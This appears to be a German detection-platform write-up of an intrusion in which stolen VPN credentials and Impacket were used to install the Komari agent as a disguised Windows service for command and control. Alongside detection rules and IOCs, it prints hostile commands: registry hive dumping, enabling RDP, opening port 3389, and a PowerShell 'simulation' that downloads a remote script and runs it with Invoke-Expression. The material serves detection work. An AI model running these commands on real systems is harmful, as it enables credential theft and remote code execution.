Folgen 
Detection stack
- AIDR
- Alert
- ETL
- Query
Zusammenfassung
Ein Bedrohungsakteur nutzte gestohlene VPN-Zugangsdaten, um auf die Windows-Arbeitsstation eines Huntress-Partners zuzugreifen, aktivierte dann RDP und setzte den Open-Source-Monitoring-Agenten Komari als Dienst auf Systemebene ein, der als Windows Update Service durch NSSM getarnt war. Nach der Installation stellte der Agent eine persistente WebSocket-Verbindung zur von Angreifern kontrollierten Infrastruktur her und bot Funktionen wie Befehlsausführung, Terminalzugriff und Ping-Aktivitäten im Heartbeat-Stil. In der Praxis fungierte das Tool als leichtgewichtiges Command-and-Control-Framework ohne zusätzliche Bewaffnung.
Untersuchung
Der Einbruch begann mit einem SSL-VPN-Login, das von 45.153.34.132ausging, gefolgt von der Nutzung von Impacket’s smbexec.py , um RDP zu aktivieren und eine Reihe von Remote-Befehlen auszuführen. Die Ermittler fanden heraus, dass ein PowerShell-Einzeiler den Komari-Installer direkt von GitHub herunterlud und als Windows-Dienst registrierte. Dieser Dienst startete dann komari-agent.exe, öffnete eine WebSocket-Sitzung zum Server des Angreifers und ermöglichte beliebige Remote-Befehlsausführung auf dem Host.
Minderung
Huntress reagierte, indem die kompromittierte Arbeitsstation isoliert, das betroffene Benutzerkonto deaktiviert und der durch NSSM erstellte Komari-Dienst gestoppt wurde. Die bösartige WebSocket-Verbindung wurde blockiert und der Persistenzmechanismus aus dem System entfernt. Empfohlene Folgeverteidigungsmaßnahmen umfassen die Verschärfung der VPN-Zugriffskontrollen, die Überwachung verdächtiger Dienst-Erstellungsereignisse, die Inspektion ausgehender WebSocket-Aktivitäten und die Verstärkung der RDP-Sicherheit.
Reaktion
Verteidiger sollten die Erstellung eines Windows-Dienstes namens Windows Update Service erkennen, der auf komari-agent.exezeigt, lange ausgehende WebSocket-Verbindungen zu unbekannten Hosts überwachen und auf die Verwendung von Impacket-Tools wie smbexec.py für laterale Bewegungen alarmieren. Wenn identifiziert, sollte der betroffene Endpunkt sofort eingedämmt, kompromittierte Anmeldedaten widerrufen und der Schurken-Dienst aus der Umgebung entfernt werden.
graph TB %% Class Definitions classDef action fill:#99ccff classDef technique fill:#ffcc99 classDef tool fill:#cccccc classDef process fill:#e6e6fa %% Nodes – Actions / Techniques action_initial_access[„<b>Aktion</b> – <b>T1078 Gültige Konten</b><br/><b>Beschreibung</b>: Gestohlene VPN-Anmeldedaten verwenden, um eine SSLVPN-Sitzung zu etablieren und anfänglichen Zugriff zu erhalten.“] class action_initial_access technique action_cred_dump[„<b>Aktion</b> – <b>T1552.002 Ungesicherte Anmeldedaten</b><br/><b>Beschreibung</b>: SAM-, System- und Sicherheits-Registry-Beeinträchtigungen dumpen, um Passwort-Hashes zu erhalten.“] class action_cred_dump technique action_enable_rdp[„<b>Aktion</b> – <b>T1599 Netzwerkgrenzen-Überbrückung</b><br/><b>Beschreibung</b>: Den Registrierungs-Schlüssel fDenyTSConnections ändern, um den Zugriff über das Remote-Desktop-Protokoll zu ermöglichen.“] class action_enable_rdp technique action_firewall_rule[„<b>Aktion</b> – <b>T1562.004 Verteidigungen Beeinträchtigen</b><br/><b>Beschreibung</b>: Eine Firewall-Regel namens Allow RDP erstellen, die den eingehenden TCP-Port 3389 öffnet.“] class action_firewall_rule technique %% Nodes – Tools / Processes tool_vpn[„<b>Tool</b> – <b>Name</b>: VPN-Client<br/><b>Zweck</b>: Verbindung mit dem Unternehmensnetzwerk über SSLVPN.“] class tool_vpn tool process_regdump[„<b>Prozess</b> – <b>Befehl</b>: reg save HKLM\SYSTEM\…<br/><b>Beschreibung</b>: SAM-, System- und Sicherheits-Registry-Beeinträchtigungen dumpen.“] class process_regdump process process_reg_modify[„<b>Prozess</b> – <b>Befehl</b>: reg add HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server /v fDenyTSConnections /t REG_DWORD /d 0 /f<br/><b>Beschreibung</b>: RDP durch Registrierung-Änderung aktivieren.“] class process_reg_modify process process_fw_rule[„<b>Prozess</b> – <b>Befehl</b>: netsh advfirewall firewall add rule name=“Allow RDP“ dir=in action=allow protocol=TCP localport=3389<br/><b>Beschreibung</b>: Firewall-Regel hinzufügen, um eingehenden RDP-Verkehr zuzulassen.“] class process_fw_rule process %% Connections action_initial_access –>|verwendet| tool_vpn action_initial_access –>|führt zu| action_cred_dump action_cred_dump –>|verwendet| process_regdump action_cred_dump –>|führt zu| action_enable_rdp action_enable_rdp –>|verwendet| process_reg_modify action_enable_rdp –>|führt zu| action_firewall_rule action_firewall_rule –>|verwendet| process_fw_rule
Angriffsfluss
Erkennungen
Mögliche Impacket-Befehlszeilenmuster (über cmdline)
Anzeigen
Mögliche Remote-Code-Ausführung mit Impacket (über cmdline)
Anzeigen
Powershell führt Datei in verdächtigem Verzeichnis unter Verwendung von Bypass-Execution-Policy aus (über cmdline)
Anzeigen
Herunterladen oder Hochladen über Powershell (über cmdline)
Anzeigen
Mögliches Remote-Desktop-Services-Shadowing (über process_creation)
Anzeigen
Verdächtige Firewall-Modifikationen über CLI (über cmdline)
Anzeigen
Verdächtiger Prozess nutzt eine URL in der Befehlszeile (über cmdline)
Anzeigen
Alternative Remote-Zugriffs-/Verwaltungssoftware (über process_creation)
Anzeigen
IOCs (HashSha256) zur Erkennung: Komari: Das „Überwachungs“-Tool, das keine Bewaffnung benötigte
Anzeigen
IOCs (SourceIP) zur Erkennung: Komari: Das „Überwachungs“-Tool, das keine Bewaffnung benötigte
Anzeigen
IOCs (DestinationIP) zur Erkennung: Komari: Das „Überwachungs“-Tool, das keine Bewaffnung benötigte
Anzeigen
Erkennung von Impacket smbexec.py und cmd.exe-Ausführung über RDP [Windows-Prozessaktivierung]
Anzeigen
PowerShell-Ausführung für die Installation des Komari-Agents [Windows PowerShell]
Anzeigen
Erkennung der Komari-Agent-Persistenz über den Windows Update-Dienst [Windows-System]
Anzeigen
Erkennung von unberechtigtem SSLVPN-Zugriff und Aktivitäten nach dem Eindringen [Firewall]
Anzeigen
Simulationsausführung
Voraussetzung: Der Telemetrie- und Basislinien-Vorflug-Check muss bestanden werden.
-
Angriffserzählung & Befehle:
Ein Gegner hat Zugriff auf einen Windows-Host erlangt und möchte den Komari C2-Agent installieren, um die Persistenz zu bewahren und später Anmeldedaten zu dumpen (T1003.001). Um traditionelle Skript-Blocking-Verteidigungen zu umgehen, führt der Angreifer PowerShell mit-ExecutionPolicy Bypassaus und lädt den Installer direkt aus dem öffentlichen GitHub-Repository herunter. Die Befehlszeile entspricht genau der Erkennungsregel und generiert die erwartete Telemetrie. -
Regressionstest-Skript:
# Komari-Agenten-Installation Simulation $url = "https://raw.githubusercontent.com/komari-monitor/komari-agent/main/install.ps1" $script = (New-Object System.Net.WebClient).DownloadString($url) Invoke-Expression $script -
Aufräumbefehle:
# Entfernen von Dateien, die durch den simulierten Installer erstellt wurden (falls vorhanden) Remove-Item -Path "$Env:ProgramFilesKomari" -Recurse -Force -ErrorAction SilentlyContinue # Stoppen von Komari-Prozessen, die möglicherweise gestartet wurden Get-Process -Name "Komari" -ErrorAction SilentlyContinue | Stop-Process -Force